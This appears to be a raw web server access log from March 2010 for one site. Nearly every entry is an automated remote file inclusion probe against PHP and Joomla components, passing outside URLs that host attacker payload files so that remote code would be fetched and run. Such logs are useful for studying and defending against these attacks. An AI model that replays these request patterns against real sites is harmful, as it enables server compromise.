77.241.83.107 - - [07/Mar/2010:04:50:32 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.leaderpmc.com/banner/id.txt??? HTTP/1.1" 200 4950 "-" "libwww-perl/5.813" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:50:37 -0800] "GET /logs/access_100219.log%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zlama.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:50:52 -0800] "GET /logs/access_100208.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:50:52 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:50:52 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [07/Mar/2010:04:51:30 -0800] "GET /logs/access_100207.log//modules/xfsection/modify.php?dir_module=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [07/Mar/2010:04:51:31 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [07/Mar/2010:04:51:36 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:52:37 -0800] "GET /logs/access_100219.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [07/Mar/2010:04:53:57 -0800] "GET /logs/access_100204.log//modules/xfsection/modify.php?dir_module=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.178.130 - - [07/Mar/2010:04:54:09 -0800] "GET /logs/access_100207.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.displaycom.co.kr/board/ins2tall/evy/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.178.130 - - [07/Mar/2010:04:54:09 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.displaycom.co.kr/board/ins2tall/evy/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.178.130 - - [07/Mar/2010:04:54:09 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.displaycom.co.kr/board/ins2tall/evy/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [07/Mar/2010:04:55:34 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [07/Mar/2010:04:55:34 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [07/Mar/2010:04:55:34 -0800] "GET /logs/access_100225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.178.130 - - [07/Mar/2010:04:55:38 -0800] "GET /logs/access_100207.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.displaycom.co.kr/board/ins2tall/evy/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.178.130 - - [07/Mar/2010:04:55:53 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.displaycom.co.kr/board/ins2tall/evy/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.178.130 - - [07/Mar/2010:04:55:53 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.displaycom.co.kr/board/ins2tall/evy/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.178.130 - - [07/Mar/2010:04:55:53 -0800] "GET /logs/access_100207.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.displaycom.co.kr/board/ins2tall/evy/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [07/Mar/2010:04:55:59 -0800] "GET /logs/access_100204.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.178.130 - - [07/Mar/2010:04:56:12 -0800] "GET /logs/access_100226.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.displaycom.co.kr/board/ins2tall/evy/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:04:56:37 -0800] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:04:56:37 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:04:56:37 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:04:56:39 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:04:56:39 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:04:56:39 -0800] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:57:31 -0800] "GET /logs/access_100219.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zlama.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:57:31 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zlama.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:57:31 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zlama.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:57:31 -0800] "GET /logs/access_100208.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zlama.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:04:57:35 -0800] "GET /logs/access_100219.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.178.130 - - [07/Mar/2010:04:57:40 -0800] "GET /logs/access_100226.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.displaycom.co.kr/board/ins2tall/evy/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:04:57:45 -0800] "GET /logs/access_100219.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:05:00:26 -0800] "GET /logs/access_100203.log%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [07/Mar/2010:05:00:28 -0800] "GET /logs/access_100206.log%20%20///bbs///write_update.php?board_skin_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [07/Mar/2010:05:00:28 -0800] "GET /logs///bbs///write_update.php?board_skin_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.101.214.54 - - [07/Mar/2010:05:00:28 -0800] "GET //bbs///write_update.php?board_skin_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:05:00:39 -0800] "GET /logs/access_100208.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:05:00:39 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:05:00:39 -0800] "GET /logs/access_100219.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:05:00:39 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:05:00:53 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:05:00:53 -0800] "GET /logs/access_100227.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:05:00:53 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:05:00:54 -0800] "GET /logs/access_100219.log%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zlama.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:05:01:01 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:05:01:01 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:05:01:01 -0800] "GET /logs/access_100227.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:05:01:13 -0800] "GET /logs/access_100208.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:01:13 -0800] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:01:13 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:01:13 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:05:01:21 -0800] "GET /logs/access_100208.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:01:21 -0800] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:01:21 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:01:25 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:05:01:26 -0800] "GET /logs/access_100212.log%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:02:20 -0800] "GET /logs/access_100217.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [07/Mar/2010:05:02:33 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [07/Mar/2010:05:02:33 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [07/Mar/2010:05:02:37 -0800] "GET /logs/access_100207.log%20%20//modules/xfsection/modify.php?dir_module=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.84.95.167 - - [07/Mar/2010:05:02:51 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
88.84.95.167 - - [07/Mar/2010:05:02:51 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
121.101.214.54 - - [07/Mar/2010:05:03:00 -0800] "GET /logs/access_100214.log%20%20///bbs///write_update.php?board_skin_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:05:03:01 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:05:03:01 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:05:03:01 -0800] "GET /logs/access_100211.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:03:08 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:03:09 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:03:09 -0800] "GET /logs/access_100219.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:03:10 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:03:11 -0800] "GET /logs/access_100219.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:03:11 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:03:19 -0800] "GET /logs/access_100219.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:03:20 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:03:20 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [07/Mar/2010:05:03:20 -0800] "GET /logs/access_100204.log%20%20//modules/xfsection/modify.php?dir_module=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:03:27 -0800] "GET /logs/access_100217.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:05:04:19 -0800] "GET /logs/access_100227.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:05:04:19 -0800] "GET /logs/access_100208.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [07/Mar/2010:05:05:37 -0800] "GET /errors.php?error=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [07/Mar/2010:05:05:37 -0800] "GET /logs/errors.php?error=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [07/Mar/2010:05:05:37 -0800] "GET /logs/access_100131.log/errors.php?error=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:05:06:11 -0800] "GET /logs/access_100207.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:06:32 -0800] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:06:32 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:06:32 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.160.77 - - [07/Mar/2010:05:06:40 -0800] "GET /logs/access_100209.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [07/Mar/2010:05:06:40 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [07/Mar/2010:05:06:40 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
123.143.29.250 - - [07/Mar/2010:05:06:40 -0800] "GET /logs/access_100219.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.160.77 - - [07/Mar/2010:05:06:57 -0800] "GET /logs/access_100205.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
195.190.166.35 - - [07/Mar/2010:05:07:14 -0800] "GET /logs/access_100209.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
195.190.166.35 - - [07/Mar/2010:05:07:15 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
195.190.166.35 - - [07/Mar/2010:05:07:15 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
195.190.166.35 - - [07/Mar/2010:05:07:30 -0800] "GET /logs/access_100205.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:05:08:07 -0800] "GET /logs/access_100208.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:05:08:07 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:05:08:07 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.102.68 - - [07/Mar/2010:05:08:17 -0800] "GET /logs/access_100213.log%20%20///setup.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.102.68 - - [07/Mar/2010:05:08:17 -0800] "GET /logs///setup.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.102.68 - - [07/Mar/2010:05:08:17 -0800] "GET //setup.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
